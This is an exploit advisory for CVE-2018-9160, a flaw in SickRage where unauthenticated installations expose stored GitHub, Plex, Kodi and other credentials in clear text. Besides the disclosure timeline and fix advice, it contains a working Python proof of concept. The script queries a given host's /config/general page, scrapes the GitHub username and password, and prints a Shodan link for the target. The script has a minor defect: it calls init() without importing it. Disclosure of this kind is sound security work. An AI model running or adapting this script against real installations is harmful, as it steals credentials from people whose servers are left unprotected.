# Exploit Title: SickRage < v2018.03.09 - Clear-Text Credentials HTTP Response # Date: 2018-04-01 # Exploit Author: Sven Fassbender # Vendor Homepage: https://sickrage.github.io # Software Link: https://github.com/SickRage/SickRage # Version: < v2018.03.09-1 # CVE : CVE-2018-9160 # Category: webapps #1. Background information "SickRage is an automatic Video Library Manager for TV Shows. It watches for new episodes of your favourite shows, and when they are posted it does its magic: automatic torrent/nzb searching, downloading, and processing at the qualities you want." --extract from https://sickrage.github.io #2. Vulnerability description SickRage returns clear-text credentials for e.g. GitHub, AniDB, Kodi, Plex etc. in HTTP responses. Prerequisite is that the user did not set a username and password for their SickRage installation. (not enforced, default) HTTP request: GET /config/general/ HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 HTTP response: HTTP/1.1 200 OK Content-Length: 113397 Vary: Accept-Encoding Server: TornadoServer/4.5.1 Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37" Date: Fri, 02 Mar 2018 10:47:51 GMT Content-Type: text/html; charset=UTF-8 [...] [...] [...] #3. Proof of Concept #!/usr/bin/env python import urllib3 import sys import requests from BeautifulSoup import BeautifulSoup urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) init(autoreset=True) if __name__ == '__main__': if len(sys.argv) != 3: print "Usage: $ " + sys.argv[0] + " [IP_adress] [port]" else: host = sys.argv[1] print "https://www.shodan.io/host/{0}".format(host) port = sys.argv[2] print "*** Get GitHub User credentials from SickRage ***" url = "http://{0}:{1}/config/general".format(host, port) response = requests.get(url, timeout=5) parsed_html = BeautifulSoup(response.text) try: git_username = parsed_html.body.find('input', {'id': 'git_username'}).get("value") git_password = parsed_html.body.find('input', {'id': 'git_password'}).get("value") if str(git_password) != "None" and str(git_password) != "None": if len(git_password) >= 1 and len(git_username) >= 1: print str(git_username) print str(git_password) except AttributeError: pass #4. Timeline [2018-03-07] Vulnerability discovered [2018-03-08] Vendor contacted [2018-03-08] Vendor replied [2018-03-09] Vulnerability fixed. (https://github.com/SickRage/SickRage/compare/v2018.02.26-2...v2018.03.09-1) #5. Recommendation Update the SickRage installation on v2018.03.09-1 or later. Protect the access to the web application with proper user credentials.